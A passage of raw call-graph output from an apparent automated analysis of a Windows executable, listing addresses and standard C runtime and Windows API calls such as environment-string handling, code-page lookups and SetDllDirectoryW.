7ff79ea5c9f9 17119->17121 17120->17098 17122 7ff79ea5c9fd SetEnvironmentVariableW 17121->17122 17123 7ff79ea5ca75 17121->17123 17122->17117 17124 7ff79ea5ca20 17122->17124 17125 7ff79ea567e8 _wfindfirst32i64 17 API calls 17123->17125 17127 7ff79ea5137c _wfindfirst32i64 13 API calls 17124->17127 17126 7ff79ea5ca89 17125->17126 17127->17117 17129 7ff79ea5cbb4 17128->17129 17135 7ff79ea5cb97 17128->17135 17130 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17129->17130 17138 7ff79ea5cbd8 17130->17138 17131 7ff79ea5cc39 17133 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17131->17133 17132 7ff79ea56530 33 API calls 17134 7ff79ea5cc62 17132->17134 17133->17135 17135->17085 17136 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17136->17138 17137 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17137->17138 17138->17131 17138->17136 17138->17137 17139 7ff79ea5c364 _wfindfirst32i64 30 API calls 17138->17139 17140 7ff79ea5cc48 17138->17140 17142 7ff79ea5cc5c 17138->17142 17139->17138 17141 7ff79ea567e8 _wfindfirst32i64 17 API calls 17140->17141 17141->17142 17142->17132 17144 7ff79ea5cac1 17143->17144 17151 7ff79ea5caa9 17143->17151 17145 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17144->17145 17154 7ff79ea5cae5 17145->17154 17146 7ff79ea5cb6a 17147 7ff79ea56530 33 API calls 17146->17147 17149 7ff79ea5cb70 17147->17149 17148 7ff79ea5cb46 17150 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17148->17150 17150->17151 17151->17035 17152 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17152->17154 17153 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17153->17154 17154->17146 17154->17148 17154->17152 17154->17153 17155 7ff79ea564d0 30 API calls 17154->17155 17156 7ff79ea5cb55 17154->17156 17155->17154 17157 7ff79ea567e8 _wfindfirst32i64 17 API calls 17156->17157 17157->17146 17159 7ff79ea55738 17158->17159 17160 7ff79ea55741 17158->17160 17159->17160 17258 7ff79ea55234 17159->17258 17160->17032 17160->17049 17165 7ff79ea61d6c 17164->17165 17166 7ff79ea62bd5 17164->17166 17167 7ff79ea61d79 17165->17167 17174 7ff79ea61daf 17165->17174 17168 7ff79ea4eff8 33 API calls 17166->17168 17170 7ff79ea5137c _wfindfirst32i64 13 API calls 17167->17170 17188 7ff79ea61d20 17167->17188 17171 7ff79ea62c09 17168->17171 17169 7ff79ea61dd9 17172 7ff79ea5137c _wfindfirst32i64 13 API calls 17169->17172 17173 7ff79ea61d83 17170->17173 17175 7ff79ea62c0e 17171->17175 17179 7ff79ea62c1f 17171->17179 17180 7ff79ea62c36 17171->17180 17176 7ff79ea61dde 17172->17176 17177 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17173->17177 17174->17169 17178 7ff79ea61dfe 17174->17178 17175->17051 17182 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17176->17182 17183 7ff79ea61d8e 17177->17183 17187 7ff79ea4eff8 33 API calls 17178->17187 17191 7ff79ea61de9 17178->17191 17181 7ff79ea5137c _wfindfirst32i64 13 API calls 17179->17181 17185 7ff79ea62c40 17180->17185 17186 7ff79ea62c52 17180->17186 17184 7ff79ea62c24 17181->17184 17182->17191 17183->17051 17189 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17184->17189 17190 7ff79ea5137c _wfindfirst32i64 13 API calls 17185->17190 17192 7ff79ea62c7a 17186->17192 17193 7ff79ea62c63 17186->17193 17187->17191 17188->17051 17189->17175 17195 7ff79ea62c45 17190->17195 17191->17051 17477 7ff79ea648a0 17192->17477 17468 7ff79ea61dbc 17193->17468 17198 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17195->17198 17198->17175 17199 7ff79ea5137c _wfindfirst32i64 13 API calls 17199->17175 17201 7ff79ea5ede2 17200->17201 17202 7ff79ea5edff 17200->17202 17201->17202 17203 7ff79ea5edf0 17201->17203 17205 7ff79ea5ee09 17202->17205 17512 7ff79ea63668 17202->17512 17206 7ff79ea5137c _wfindfirst32i64 13 API calls 17203->17206 17519 7ff79ea5c3cc 17205->17519 17208 7ff79ea5edf5 __scrt_get_show_window_mode 17206->17208 17208->17063 17210 7ff79ea4eff8 33 API calls 17209->17210 17211 7ff79ea62d46 17210->17211 17212 7ff79ea62d54 17211->17212 17213 7ff79ea5a948 5 API calls 17211->17213 17214 7ff79ea51478 16 API calls 17212->17214 17213->17212 17215 7ff79ea62dac 17214->17215 17216 7ff79ea62e38 17215->17216 17217 7ff79ea4eff8 33 API calls 17215->17217 17219 7ff79ea62e49 17216->17219 17220 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17216->17220 17218 7ff79ea62dbf 17217->17218 17222 7ff79ea5a948 5 API calls 17218->17222 17224 7ff79ea62dc8 17218->17224 17221 7ff79ea5c6ff 17219->17221 17223 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17219->17223 17220->17219 17221->17068 17221->17079 17222->17224 17223->17221 17225 7ff79ea51478 16 API calls 17224->17225 17226 7ff79ea62e1f 17225->17226 17226->17216 17227 7ff79ea62e27 SetEnvironmentVariableW 17226->17227 17227->17216 17229 7ff79ea5577d 17228->17229 17230 7ff79ea55774 17228->17230 17229->17083 17229->17101 17230->17229 17531 7ff79ea552a0 17230->17531 17235 7ff79ea62a95 17234->17235 17239 7ff79ea62ac2 17234->17239 17236 7ff79ea62a9a 17235->17236 17235->17239 17237 7ff79ea5137c _wfindfirst32i64 13 API calls 17236->17237 17240 7ff79ea62a9f 17237->17240 17238 7ff79ea62b06 17241 7ff79ea5137c _wfindfirst32i64 13 API calls 17238->17241 17239->17238 17242 7ff79ea62b25 17239->17242 17256 7ff79ea62afa __crtLCMapStringW 17239->17256 17243 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17240->17243 17247 7ff79ea62b0b 17241->17247 17244 7ff79ea62b2f 17242->17244 17245 7ff79ea62b41 17242->17245 17246 7ff79ea62aaa 17243->17246 17248 7ff79ea5137c _wfindfirst32i64 13 API calls 17244->17248 17249 7ff79ea4eff8 33 API calls 17245->17249 17246->17093 17250 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17247->17250 17251 7ff79ea62b34 17248->17251 17252 7ff79ea62b4e 17249->17252 17250->17256 17253 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17251->17253 17252->17256 17573 7ff79ea64480 17252->17573 17253->17256 17256->17093 17257 7ff79ea5137c _wfindfirst32i64 13 API calls 17257->17256 17259 7ff79ea5524d 17258->17259 17268 7ff79ea55249 17258->17268 17278 7ff79ea5dfe0 17259->17278 17264 7ff79ea5525f 17266 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17264->17266 17266->17268 17268->17160 17270 7ff79ea55568 17268->17270 17269 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17269->17264 17271 7ff79ea55587 17270->17271 17274 7ff79ea5559a 17270->17274 17271->17160 17272 7ff79ea5b9f8 WideCharToMultiByte 17272->17274 17273 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17273->17274 17274->17271 17274->17272 17274->17273 17275 7ff79ea5562c 17274->17275 17277 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17274->17277 17276 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17275->17276 17276->17271 17277->17274 17279 7ff79ea5dfed 17278->17279 17283 7ff79ea55252 17278->17283 17313 7ff79ea59704 17279->17313 17284 7ff79ea5e318 GetEnvironmentStringsW 17283->17284 17285 7ff79ea5e3e8 17284->17285 17286 7ff79ea5e346 17284->17286 17287 7ff79ea55257 17285->17287 17288 7ff79ea5e3f2 FreeEnvironmentStringsW 17285->17288 17289 7ff79ea5b9f8 WideCharToMultiByte 17286->17289 17287->17264 17296 7ff79ea55308 17287->17296 17288->17287 17290 7ff79ea5e398 17289->17290 17290->17285 17291 7ff79ea58c00 _fread_nolock 14 API calls 17290->17291 17292 7ff79ea5e3a7 17291->17292 17293 7ff79ea5e3d1 17292->17293 17294 7ff79ea5b9f8 WideCharToMultiByte 17292->17294 17295 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17293->17295 17294->17293 17295->17285 17297 7ff79ea5532f 17296->17297 17298 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17297->17298 17308 7ff79ea55364 17298->17308 17299 7ff79ea553d3 17300 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17299->17300 17301 7ff79ea5526c 17300->17301 17301->17269 17302 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17302->17308 17303 7ff79ea553c4 17462 7ff79ea55524 17303->17462 17304 7ff79ea564d0 30 API calls 17304->17308 17307 7ff79ea553fb 17310 7ff79ea567e8 _wfindfirst32i64 17 API calls 17307->17310 17308->17299 17308->17302 17308->17303 17308->17304 17308->17307 17311 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17308->17311 17309 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17309->17299 17312 7ff79ea5540d 17310->17312 17311->17308 17314 7ff79ea59715 17313->17314 17315 7ff79ea5971a 17313->17315 17316 7ff79ea5aaf0 _invalid_parameter_noinfo 6 API calls 17314->17316 17317 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 17315->17317 17318 7ff79ea59722 17315->17318 17316->17315 17319 7ff79ea59739 17317->17319 17320 7ff79ea56530 33 API calls 17318->17320 17326 7ff79ea5979c 17318->17326 17319->17318 17321 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17319->17321 17323 7ff79ea597aa 17320->17323 17322 7ff79ea5974c 17321->17322 17324 7ff79ea5976a 17322->17324 17325 7ff79ea5975a 17322->17325 17328 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 17324->17328 17327 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 17325->17327 17338 7ff79ea5dd64 17326->17338 17329 7ff79ea59761 17327->17329 17330 7ff79ea59772 17328->17330 17333 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17329->17333 17331 7ff79ea59788 17330->17331 17332 7ff79ea59776 17330->17332 17335 7ff79ea593d4 _invalid_parameter_noinfo 13 API calls 17331->17335 17334 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 17332->17334 17333->17318 17334->17329 17336 7ff79ea59790 17335->17336 17337 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17336->17337 17337->17318 17356 7ff79ea5df24 17338->17356 17340 7ff79ea5dd8d 17371 7ff79ea5da70 17340->17371 17343 7ff79ea5dda7 17343->17283 17344 7ff79ea58c00 _fread_nolock 14 API calls 17347 7ff79ea5ddb8 17344->17347 17345 7ff79ea5de53 17346 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17345->17346 17346->17343 17347->17345 17378 7ff79ea5e05c 17347->17378 17350 7ff79ea5de4e 17351 7ff79ea5137c _wfindfirst32i64 13 API calls 17350->17351 17351->17345 17352 7ff79ea5deb0 17352->17345 17389 7ff79ea5d8b4 17352->17389 17353 7ff79ea5de73 17353->17352 17354 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17353->17354 17354->17352 17357 7ff79ea5df47 17356->17357 17358 7ff79ea5df51 17357->17358 17404 7ff79ea5c1c8 EnterCriticalSection 17357->17404 17360 7ff79ea5dfc3 17358->17360 17363 7ff79ea56530 33 API calls 17358->17363 17360->17340 17364 7ff79ea5dfdb 17363->17364 17366 7ff79ea5e032 17364->17366 17368 7ff79ea59704 33 API calls 17364->17368 17366->17340 17369 7ff79ea5e01c 17368->17369 17370 7ff79ea5dd64 43 API calls 17369->17370 17370->17366 17372 7ff79ea4eff8 33 API calls 17371->17372 17373 7ff79ea5da84 17372->17373 17374 7ff79ea5da90 GetOEMCP 17373->17374 17375 7ff79ea5daa2 17373->17375 17376 7ff79ea5dab7 17374->17376 17375->17376 17377 7ff79ea5daa7 GetACP 17375->17377 17376->17343 17376->17344 17377->17376 17379 7ff79ea5da70 35 API calls 17378->17379 17380 7ff79ea5e087 17379->17380 17382 7ff79ea5e0c4 IsValidCodePage 17380->17382 17388 7ff79ea5e107 __scrt_get_show_window_mode 17380->17388 17381 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17383 7ff79ea5de47 17381->17383 17384 7ff79ea5e0d5 17382->17384 17382->17388 17383->17350 17383->17353 17385 7ff79ea5e10c GetCPInfo 17384->17385 17386 7ff79ea5e0de __scrt_get_show_window_mode 17384->17386 17385->17386 17385->17388 17405 7ff79ea5db80 17386->17405 17388->17381 17461 7ff79ea5c1c8 EnterCriticalSection 17389->17461 17406 7ff79ea5dbbd GetCPInfo 17405->17406 17407 7ff79ea5dcb3 17405->17407 17406->17407 17408 7ff79ea5dbd0 17406->17408 17409 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17407->17409 17410 7ff79ea5e824 36 API calls 17408->17410 17411 7ff79ea5dd4c 17409->17411 17412 7ff79ea5dc47 17410->17412 17411->17388 17416 7ff79ea635b8 17412->17416 17415 7ff79ea635b8 37 API calls 17415->17407 17417 7ff79ea4eff8 33 API calls 17416->17417 17418 7ff79ea635dd 17417->17418 17421 7ff79ea632a0 17418->17421 17422 7ff79ea632e2 17421->17422 17423 7ff79ea5b218 _fread_nolock MultiByteToWideChar 17422->17423 17427 7ff79ea6332c 17423->17427 17424 7ff79ea6356b 17425 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17424->17425 17426 7ff79ea5dc7a 17425->17426 17426->17415 17427->17424 17428 7ff79ea58c00 _fread_nolock 14 API calls 17427->17428 17429 7ff79ea6335f 17427->17429 17428->17429 17430 7ff79ea5b218 _fread_nolock MultiByteToWideChar 17429->17430 17432 7ff79ea63463 17429->17432 17431 7ff79ea633d1 17430->17431 17431->17432 17449 7ff79ea5abf0 17431->17449 17432->17424 17433 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17432->17433 17433->17424 17436 7ff79ea63420 17436->17432 17438 7ff79ea5abf0 __crtLCMapStringW 6 API calls 17436->17438 17437 7ff79ea63472 17439 7ff79ea58c00 _fread_nolock 14 API calls 17437->17439 17441 7ff79ea6348c 17437->17441 17438->17432 17439->17441 17440 7ff79ea5abf0 __crtLCMapStringW 6 API calls 17443 7ff79ea6350d 17440->17443 17441->17432 17441->17440 17442 7ff79ea63542 17442->17432 17444 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17442->17444 17443->17442 17455 7ff79ea5b9f8 17443->17455 17444->17432 17450 7ff79ea5a720 try_get_function 5 API calls 17449->17450 17451 7ff79ea5ac2e 17450->17451 17452 7ff79ea5ac33 17451->17452 17458 7ff79ea5accc 17451->17458 17452->17432 17452->17436 17452->17437 17454 7ff79ea5ac8f LCMapStringW 17454->17452 17457 7ff79ea5ba1b WideCharToMultiByte 17455->17457 17459 7ff79ea5a720 try_get_function 5 API calls 17458->17459 17460 7ff79ea5acfa __crtLCMapStringW 17459->17460 17460->17454 17463 7ff79ea55529 17462->17463 17464 7ff79ea553cc 17462->17464 17465 7ff79ea55552 17463->17465 17466 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17463->17466 17464->17309 17467 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17465->17467 17466->17463 17467->17464 17469 7ff79ea61dd9 17468->17469 17470 7ff79ea61df0 17468->17470 17471 7ff79ea5137c _wfindfirst32i64 13 API calls 17469->17471 17470->17469 17473 7ff79ea61dfe 17470->17473 17472 7ff79ea61dde 17471->17472 17474 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17472->17474 17475 7ff79ea4eff8 33 API calls 17473->17475 17476 7ff79ea61de9 17473->17476 17474->17476 17475->17476 17476->17175 17478 7ff79ea4eff8 33 API calls 17477->17478 17479 7ff79ea648c5 17478->17479 17482 7ff79ea64540 17479->17482 17487 7ff79ea6458a 17482->17487 17483 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17484 7ff79ea62ca1 17483->17484 17484->17175 17484->17199 17485 7ff79ea64611 17486 7ff79ea5b218 _fread_nolock MultiByteToWideChar 17485->17486 17493 7ff79ea64615 17485->17493 17489 7ff79ea646a9 17486->17489 17487->17485 17488 7ff79ea645fc GetCPInfo 17487->17488 17487->17493 17488->17485 17488->17493 17490 7ff79ea646dc 17489->17490 17491 7ff79ea58c00 _fread_nolock 14 API calls 17489->17491 17489->17493 17492 7ff79ea5b218 _fread_nolock MultiByteToWideChar 17490->17492 17495 7ff79ea64859 17490->17495 17491->17490 17494 7ff79ea6474b 17492->17494 17493->17483 17494->17495 17496 7ff79ea5b218 _fread_nolock MultiByteToWideChar 17494->17496 17495->17493 17497 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17495->17497 17498 7ff79ea64771 17496->17498 17497->17493 17498->17495 17499 7ff79ea58c00 _fread_nolock 14 API calls 17498->17499 17500 7ff79ea6479a 17498->17500 17499->17500 17501 7ff79ea5b218 _fread_nolock MultiByteToWideChar 17500->17501 17503 7ff79ea6483d 17500->17503 17502 7ff79ea6480b 17501->17502 17502->17503 17506 7ff79ea5a984 17502->17506 17503->17495 17504 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17503->17504 17504->17495 17507 7ff79ea5a720 try_get_function 5 API calls 17506->17507 17508 7ff79ea5a9c2 17507->17508 17509 7ff79ea5a9c7 17508->17509 17510 7ff79ea5accc __crtLCMapStringW 5 API calls 17508->17510 17509->17503 17511 7ff79ea5aa23 CompareStringW 17510->17511 17511->17509 17513 7ff79ea6368a HeapSize 17512->17513 17514 7ff79ea63671 17512->17514 17515 7ff79ea5137c _wfindfirst32i64 13 API calls 17514->17515 17516 7ff79ea63676 17515->17516 17517 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17516->17517 17518 7ff79ea63681 17517->17518 17518->17205 17520 7ff79ea5c3eb 17519->17520 17521 7ff79ea5c3e1 17519->17521 17523 7ff79ea5c3f0 17520->17523 17529 7ff79ea5c3f7 _invalid_parameter_noinfo 17520->17529 17522 7ff79ea58c00 _fread_nolock 14 API calls 17521->17522 17527 7ff79ea5c3e9 17522->17527 17524 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17523->17524 17524->17527 17525 7ff79ea5c3fd 17528 7ff79ea5137c _wfindfirst32i64 13 API calls 17525->17528 17526 7ff79ea5c42a HeapReAlloc 17526->17527 17526->17529 17527->17208 17528->17527 17529->17525 17529->17526 17530 7ff79ea5ef50 _invalid_parameter_noinfo 2 API calls 17529->17530 17530->17529 17532 7ff79ea552b9 17531->17532 17539 7ff79ea552b5 17531->17539 17549 7ff79ea5e41c GetEnvironmentStringsW 17532->17549 17535 7ff79ea552c6 17538 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17535->17538 17538->17539 17539->17229 17541 7ff79ea5563c 17539->17541 17540 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17540->17535 17542 7ff79ea55657 17541->17542 17547 7ff79ea5566a 17541->17547 17542->17229 17543 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17543->17547 17544 7ff79ea556e0 17545 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17544->17545 17545->17542 17546 7ff79ea5b218 MultiByteToWideChar _fread_nolock 17546->17547 17547->17542 17547->17543 17547->17544 17547->17546 17548 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17547->17548 17548->17547 17550 7ff79ea552be 17549->17550 17551 7ff79ea5e440 17549->17551 17550->17535 17556 7ff79ea55410 17550->17556 17552 7ff79ea58c00 _fread_nolock 14 API calls 17551->17552 17553 7ff79ea5e47a memcpy_s 17552->17553 17554 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17553->17554 17555 7ff79ea5e49a FreeEnvironmentStringsW 17554->17555 17555->17550 17557 7ff79ea55438 17556->17557 17558 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17557->17558 17566 7ff79ea55473 17558->17566 17559 7ff79ea554e8 17560 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17559->17560 17561 7ff79ea552d3 17560->17561 17561->17540 17562 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17562->17566 17563 7ff79ea554d9 17565 7ff79ea55524 13 API calls 17563->17565 17564 7ff79ea5c364 _wfindfirst32i64 30 API calls 17564->17566 17567 7ff79ea554e1 17565->17567 17566->17559 17566->17562 17566->17563 17566->17564 17568 7ff79ea55510 17566->17568 17571 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17566->17571 17569 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17567->17569 17570 7ff79ea567e8 _wfindfirst32i64 17 API calls 17568->17570 17569->17559 17572 7ff79ea55522 17570->17572 17571->17566 17574 7ff79ea644a9 __crtLCMapStringW 17573->17574 17575 7ff79ea62b8a 17574->17575 17576 7ff79ea5a984 6 API calls 17574->17576 17575->17256 17575->17257 17576->17575 17577 7ff79ea5b2d4 17578 7ff79ea5b4bc 17577->17578 17580 7ff79ea5b317 _isindst 17577->17580 17579 7ff79ea5137c _wfindfirst32i64 13 API calls 17578->17579 17595 7ff79ea5b4ae 17579->17595 17580->17578 17583 7ff79ea5b393 _isindst 17580->17583 17581 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 17582 7ff79ea5b4d7 17581->17582 17598 7ff79ea61acc 17583->17598 17588 7ff79ea5b4e8 17590 7ff79ea567e8 _wfindfirst32i64 17 API calls 17588->17590 17592 7ff79ea5b4fc 17590->17592 17595->17581 17596 7ff79ea5b3f0 17596->17595 17622 7ff79ea61b0c 17596->17622 17599 7ff79ea61ada 17598->17599 17602 7ff79ea5b3b1 17598->17602 17629 7ff79ea5c1c8 EnterCriticalSection 17599->17629 17604 7ff79ea60ec8 17602->17604 17605 7ff79ea5b3c6 17604->17605 17606 7ff79ea60ed1 17604->17606 17605->17588 17610 7ff79ea60ef8 17605->17610 17607 7ff79ea5137c _wfindfirst32i64 13 API calls 17606->17607 17608 7ff79ea60ed6 17607->17608 17609 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17608->17609 17609->17605 17611 7ff79ea5b3d7 17610->17611 17612 7ff79ea60f01 17610->17612 17611->17588 17616 7ff79ea60f28 17611->17616 17613 7ff79ea5137c _wfindfirst32i64 13 API calls 17612->17613 17614 7ff79ea60f06 17613->17614 17615 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17614->17615 17615->17611 17617 7ff79ea5b3e8 17616->17617 17618 7ff79ea60f31 17616->17618 17617->17588 17617->17596 17619 7ff79ea5137c _wfindfirst32i64 13 API calls 17618->17619 17620 7ff79ea60f36 17619->17620 17621 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17620->17621 17621->17617 17630 7ff79ea5c1c8 EnterCriticalSection 17622->17630 17736 7ff79ea54750 17737 7ff79ea54767 17736->17737 17738 7ff79ea54786 17736->17738 17740 7ff79ea5137c _wfindfirst32i64 13 API calls 17737->17740 17748 7ff79ea512ac EnterCriticalSection 17738->17748 17742 7ff79ea5476c 17740->17742 17744 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17742->17744 17746 7ff79ea54777 17744->17746 17843 7ff79ea57bd0 17854 7ff79ea5c1c8 EnterCriticalSection 17843->17854 18255 7ff79ea51250 18256 7ff79ea5125b 18255->18256 18264 7ff79ea5ada4 18256->18264 18277 7ff79ea5c1c8 EnterCriticalSection 18264->18277 17855 7ff79ea4bec0 17856 7ff79ea4bed0 17855->17856 17872 7ff79ea55bf0 17856->17872 17858 7ff79ea4bedc 17878 7ff79ea4c1c8 17858->17878 17860 7ff79ea4c4ac 7 API calls 17863 7ff79ea4bf75 17860->17863 17861 7ff79ea4bef4 _RTC_Initialize 17870 7ff79ea4bf49 17861->17870 17883 7ff79ea4c378 17861->17883 17864 7ff79ea4bf09 17886 7ff79ea550b0 17864->17886 17870->17860 17871 7ff79ea4bf65 17870->17871 17873 7ff79ea55c01 17872->17873 17874 7ff79ea5137c _wfindfirst32i64 13 API calls 17873->17874 17877 7ff79ea55c09 17873->17877 17875 7ff79ea55c18 17874->17875 17876 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17875->17876 17876->17877 17877->17858 17879 7ff79ea4c1d9 17878->17879 17880 7ff79ea4c1de __scrt_release_startup_lock 17878->17880 17879->17880 17881 7ff79ea4c4ac 7 API calls 17879->17881 17880->17861 17882 7ff79ea4c252 17881->17882 17911 7ff79ea4c33c 17883->17911 17885 7ff79ea4c381 17885->17864 17887 7ff79ea4bf15 17886->17887 17888 7ff79ea550d0 17886->17888 17887->17870 17910 7ff79ea4c44c InitializeSListHead 17887->17910 17889 7ff79ea550ee GetModuleFileNameW 17888->17889 17890 7ff79ea550d8 17888->17890 17894 7ff79ea55119 17889->17894 17891 7ff79ea5137c _wfindfirst32i64 13 API calls 17890->17891 17892 7ff79ea550dd 17891->17892 17893 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 17892->17893 17893->17887 17926 7ff79ea55050 17894->17926 17897 7ff79ea55161 17898 7ff79ea5137c _wfindfirst32i64 13 API calls 17897->17898 17899 7ff79ea55166 17898->17899 17900 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17899->17900 17900->17887 17901 7ff79ea5519b 17903 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17901->17903 17902 7ff79ea55179 17902->17901 17904 7ff79ea551c7 17902->17904 17905 7ff79ea551e0 17902->17905 17903->17887 17906 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17904->17906 17908 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17905->17908 17907 7ff79ea551d0 17906->17907 17909 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17907->17909 17908->17901 17909->17887 17912 7ff79ea4c356 17911->17912 17914 7ff79ea4c34f 17911->17914 17915 7ff79ea5621c 17912->17915 17914->17885 17918 7ff79ea55e68 17915->17918 17925 7ff79ea5c1c8 EnterCriticalSection 17918->17925 17927 7ff79ea55068 17926->17927 17931 7ff79ea550a0 17926->17931 17928 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17927->17928 17927->17931 17929 7ff79ea55096 17928->17929 17930 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17929->17930 17930->17931 17931->17897 17931->17902 14391 7ff79ea4bfac 14412 7ff79ea4c17c 14391->14412 14394 7ff79ea4c0f8 14516 7ff79ea4c4ac IsProcessorFeaturePresent 14394->14516 14395 7ff79ea4bfc8 __scrt_acquire_startup_lock 14397 7ff79ea4c102 14395->14397 14404 7ff79ea4bfe6 __scrt_release_startup_lock 14395->14404 14398 7ff79ea4c4ac 7 API calls 14397->14398 14400 7ff79ea4c10d 14398->14400 14399 7ff79ea4c00b 14401 7ff79ea4c091 14418 7ff79ea4c5f8 14401->14418 14403 7ff79ea4c096 14421 7ff79ea41000 14403->14421 14404->14399 14404->14401 14505 7ff79ea55b78 14404->14505 14409 7ff79ea4c0b9 14409->14400 14512 7ff79ea4c310 14409->14512 14523 7ff79ea4c77c 14412->14523 14415 7ff79ea4bfc0 14415->14394 14415->14395 14416 7ff79ea4c1ab __scrt_initialize_crt 14416->14415 14525 7ff79ea4d6dc 14416->14525 14552 7ff79ea4d010 14418->14552 14420 7ff79ea4c60f GetStartupInfoW 14420->14403 14422 7ff79ea4100b 14421->14422 14554 7ff79ea485b0 14422->14554 14424 7ff79ea4101d 14565 7ff79ea51dd4 14424->14565 14432 7ff79ea439ba 14467 7ff79ea43aa2 14432->14467 14590 7ff79ea47a60 14432->14590 14434 7ff79ea439ef 14435 7ff79ea43a3b 14434->14435 14437 7ff79ea47a60 42 API calls 14434->14437 14605 7ff79ea47f40 14435->14605 14439 7ff79ea43a10 14437->14439 14439->14435 14721 7ff79ea50f4c 14439->14721 14443 7ff79ea43b41 14445 7ff79ea43b65 14443->14445 14616 7ff79ea414f0 14443->14616 14450 7ff79ea43bbf 14445->14450 14445->14467 14623 7ff79ea489e0 14445->14623 14446 7ff79ea41cb0 103 API calls 14448 7ff79ea43a86 14446->14448 14447 7ff79ea47f40 31 API calls 14447->14435 14452 7ff79ea43a8a 14448->14452 14453 7ff79ea43ac8 14448->14453 14637 7ff79ea46ce0 14450->14637 14727 7ff79ea42b30 14452->14727 14453->14443 14747 7ff79ea43fa0 14453->14747 14455 7ff79ea43b9c 14459 7ff79ea43bb2 SetDllDirectoryW 14455->14459 14460 7ff79ea43ba1 14455->14460 14459->14450 14463 7ff79ea42b30 18 API calls 14460->14463 14461 7ff79ea43c17 14464 7ff79ea46c60 14 API calls 14461->14464 14463->14467 14468 7ff79ea43c0b 14464->14468 14466 7ff79ea43ae6 14473 7ff79ea42b30 18 API calls 14466->14473 14738 7ff79ea4bbf0 14467->14738 14471 7ff79ea43cd6 14468->14471 14483 7ff79ea43c2a 14468->14483 14469 7ff79ea43bd9 14469->14461 14785 7ff79ea464e0 14469->14785 14641 7ff79ea434a0 14471->14641 14473->14467 14476 